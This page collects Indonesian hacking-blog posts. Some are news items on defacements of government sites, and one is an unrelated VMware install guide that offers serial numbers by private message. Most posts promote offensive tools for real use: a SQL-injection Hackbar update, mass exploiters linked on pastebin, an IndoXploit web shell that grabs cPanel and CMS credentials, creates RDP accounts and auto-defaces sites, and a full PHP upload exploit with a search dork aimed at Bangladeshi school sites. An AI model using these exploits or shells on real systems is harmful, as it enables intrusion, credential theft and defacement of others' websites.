Situs Kepolisian Daerah Kalimantan Selatan Disambangi Hacker

Kali ini LinuxSec kembali mengabarkan kasus peretasan yang menimpa situs pemerintah Indonesia. Tepatnya situs  Kepolisian Daerah Kalimantan Selatan. Nampaknya defacer berhasil mendapatkan akses ke database situs tersebut dan mengubah tampilan halaman "Berita".

Lagi lagi pelakunya adalah Shu, yang sebelumnya meretas database KPAI. ( Retas Database KPAI, Hacker Beri Dukungan Terhadap Maniak K4sur ).

Tidak ada pesan khusus. Hanya beberapa nama yang terpampang di halaman deface mereka :

[Skeptix - Shu]

Strln - 0x0ff - Klpt0 - armx64 - Apthx - e0blx - Cx0re 

Sampai berita ini diterbitkan, belum ada perbaikan di situs kalsel.polri.go.id .

Untuk Mirror nya bisa kalian lihat disini :

kalsel.polri.go.id hacked. Notified by Shu1337

Ya semoga maraknya peretasan terhadap situs pemerintah ini menjadi perhatian bagi tim IT website pemerintah.

Sekian berita kali ini, jangan lupa subscribe untuk mendapatkan update berita terbaru dari LinuxSec.

Read more

hackbar updated

selamat datang kembali sobat injector..

setelah sekian lama team sec7or dalam mode hibernasi :D kini kami membawa kabar baru buat para sobat injector. sesepuh kami di team sec7or telah melakukan update query pada senjata andalan kita yaitu hackbar.

buat para sobat injector yang selama ini menemui kesulitan semisal angka ajaib tidak mau keluar atau misal ketika melakukan dios error based selalu gagal, mudah2an kali ini masalah itu udah bisa di atasi.

beribu ucapan terima kasih kami sampaikan buat our leet injector aka Mas Nusi dan m@dblood yang udah menyempatkan waktunya untuk memperbaiki query di hackbar.

tak lupa juga buat mas Minato,mas Sohai dan mas Versailles, terima kasih banyak atas ide-idenya :*

sekedar catatan buat sobat injector yang mengalami kesulitan ketika menginstall hackbar, mungkin karena sobat menggunakan mozilla yg terbaru.. hackbar ini hanya bisa di install di mozilla versi 30.1 ke bawah. jadi buat sobat injector yang mozillanya versi anyar silahkan melakukan downgrade ke versi 30.1 ke bawah.. saat ini saya sendiri menggunakan mozilla versi 29.

buat yang pengen update querynya silahkan di sedot..  advance hackbar update.

untuk instalasinya pun sangat mudah tinggal klik link di atas .kemudian klik allow otomatis hackbar terinstall..

happy injecting

Read more

Hacker Retas Situs Pengadilan Agama Jayapura

Lagi dan lagi... Sepertinya situs situs pemerintahan di Indonesia masih jauh dari kata aman. Hampir setiap harinya puluhan situs go.id dimirror kan ke zone-h membuktikan gencarnya aksi peretasan terhadap situs situs pemerintah Indonesia. Dan kali ini defacer berhasil menyisipkan script deface di situs pengadilan Agama Jayapura, beserta subdomain nya.

Defacer berhasil menyisipkan file html di domain pa-jayapura.go.id dan subdomain sipp.pa-jayapura.go.id, sidang.pa-jayapura.go.id, e-library.pa-jayapura.go.id. Tidak frontal mengubah index memang, peretas yang menggunakan kodenama PYS404 itu hanya menitipkan file ynr.htm di setiap domainnya.

Tidak ada pesan khusus. hanya notice jika mereka berhasil meretas situs Pengadilan Negeri Jayapura.

JombloersCrew Was Wis Wus.

NatashaHaxor - Milton - Benny-x207 - VadeL - PYS404

\./ g0t pwnd ? Lolz! \./

Cuma test min 

tidak ada unsur politik :p

Dari pesan yang ditinggalkan nampaknya defacer tersebut hanya bermaksud melakukan pentest dan memberitahu admin kalau situs nya masih terdapat celah.

Untuk Mirror nya kalian bisa lihat disini :

http://www.zone-h.org/archive/ip=49.50.8.105/special=1/notifier=pys404

Nah mungkin sekian dulu berita peretasan kali ini, stay tune di LinuxSec karena kami akan terus mengabarkan penyerangan penyerangan yang menimpa website website penting di indonesia.

Read more

WordPress Plugins Tevolution Mass Xploiter

Okee gannn, kyknyaa ini exploit lagi booming banget yaaaaa. freshhhh
Thankss buat .
// Res7ock - Aan INCEF buat live targetnyaaaa :D

Ikutin aja kyk di ss gannn.
disini script nyaaaa -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy hackingg ^_^

Read more

IndoXploit Shell First Edition [ V.2 ]

Okee Kali ini gua akan bener-bener, me-Rilis IndoXploit Shell.
Kelebihan Shell ini adalah, gua membuat shell ini se-simple mungkin. dan Se-Instan Mungkin biar lebih mudah di gunakan. dan jugaa source shell nyaaa [ OPEN SOURCE ] gaada bentuk encode" bahasa aneh :D
Semua fitur dalam shell ini dibuat Auto.
Tinggal Klik-Klik sajaa.

_{Login Shell:default password: IndoXploit}

_{Tampilan Shell}

=====> http://pastebin.com/nC6pWh5a

Fitur:
K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
Back Connect
CPanel/FTP Auto Deface:
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa
hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface
Config Grabb :
-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel
Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Read more

Auto exploiter com_media.

kali ini ane pengen share auto exploiter com_media.
yaudah langsung aja.

script:
http://pastebin.com/v23UTCeu

usage: php xploit.php target.htm

edit $file, preg_match, explode

poto:

*nb: kalo udh muncul yang base64, tapi masih NO. coba manual aja.

keep sharing :)

Read more

Deface website sekolah Bangladesh

hallo.

kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>

POC:

hasil:

/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)

Read more

Instal VMware Workstation 12 di Ubuntu 14.04 LTS

Sudah perkenalan dengan Virtualisasi VMware apa belum? Ini mungkin menambah pengetahuan anda... Perkenalan Platform Virtualiasi VMware.

Oke, disini admin ingin share mengenai instalasi VMware Workstation di GNU/Linux Ubuntu 14.04 LTS. Tujuanya membantu teman-teman yang pakai Operating System Linux dan ingin menggunakan VMware Workstation di Linux-nya. 

"Sulit apa tidak instalasi-nya mas?"

"Mudah kok, tinggal ikuti artikel ini insyaallah VMware Workstation anda sukses terinstal."

Selama ini saya menggunakan VMware Workstation di Linux cukup stabil, untuk penggunaan Virtualisasi biasa-nya tidak ada masalah. Saya sering menggunakanya untuk simulator instalasi OS, share knowledge kepada teman-teman, percobaan-percobaan pribadi, dll. Saya memilih platform VMware bukan karena VMware itu yang terpopular didunia Virtualisasi, tetapi karena telah dinyamanin aja sama platform ini. Bagi teman-teman yang ingin meng-explore ilmu VMware, saya merekomendasikan untuk belajar di salah satu Blog VMware Expert Indonesia, yes... "His name is Nathan Gusti Ryan (Owner XP Solution Surabaya)" ini blognya thinkxfree.wordpress.com, tidak hanya artikel tentang VMware, artikel yang lain juga bagus-bagus, anda bakal dihipnotis oleh treatment-treatment "kata-kata" diblog tersebut.

Maaf terlalu panjang muqodimahnya... Hehe

Kembali lagi ke topik yang akan saya share, yaitu instalasi VMware Workstation 12 di Ubuntu 14.04 LTS :

1. Silahkan download dulu aplikasi VMware Workstation 12 terbaru disini.
2. Setelah terdownload silahkan di tambah hak aksesnya.

$ sudo chmod +x VMware-Workstation-Full-12.1.0-3272444.x86_64.bundle

3. Setelah itu eksekusi file-nya untuk melanjutkan ke Instalasi.

$ sudo ./VMware-Workstation-Full-12.1.0-3272444.x86_64.bundle

4. Disini saya mendapatkan error, tetapi tidak terlalu masalah yang penting bisa troubleshooting permasalahanya.

(vmware-installer.py:19962): Gtk-WARNING **: Unable to locate theme engine in module_path: "murrine",
Gtk-Message: Failed to load module "canberra-gtk-module": libcanberra-gtk-module.so: cannot open shared object file: No such file or directory

Jangan dilanjutkan instalasinya, Ctrl+C untuk membatalkan. Baca: Diatas terdapat dua error, (1) "unable to locate theme engine in module_path: "murrine" dan (2) "Failed to load module "canberra-gtk-module". Pada kasus ini yang bisa saya troubleshooting cuma nomor dua, kalo masalah nomor satu itu cuma masalah tidak bisa load theme di modul_path "murrine" tetapi tidak ada masalah sekedar themes. Sebelumnya juga sudah saya cari-cari masalahnya dan sudah saya coba-coba solusi-solusinya tetapi tidak berhasil. Dan masalah tersebut tidak ada kaitanya dengan kinerja, proses-proses saat menjalankan VMware Workstation, jadi tenang aja bro...

Untuk cara troubleshootingya silahkan eksekusi command ini:

sudo ln -s /usr/lib/x86_64-linux-gnu/gtk-2.0/modules/libcanberra-gtk-module.so /usr/lib/libcanberra-gtk-module.so

5. Setelah dieksekusi silahkan lanjutkan instalasi sampai selesai.

6. Semoga bermanfaat... Maaf disini saya tidak jelaskan langkah-langkah instalasinya. Dan itu sebenarnya mudah banget kok... Untuk Serial Number VMware Workstation, dsb silahkan PM aja...

Read more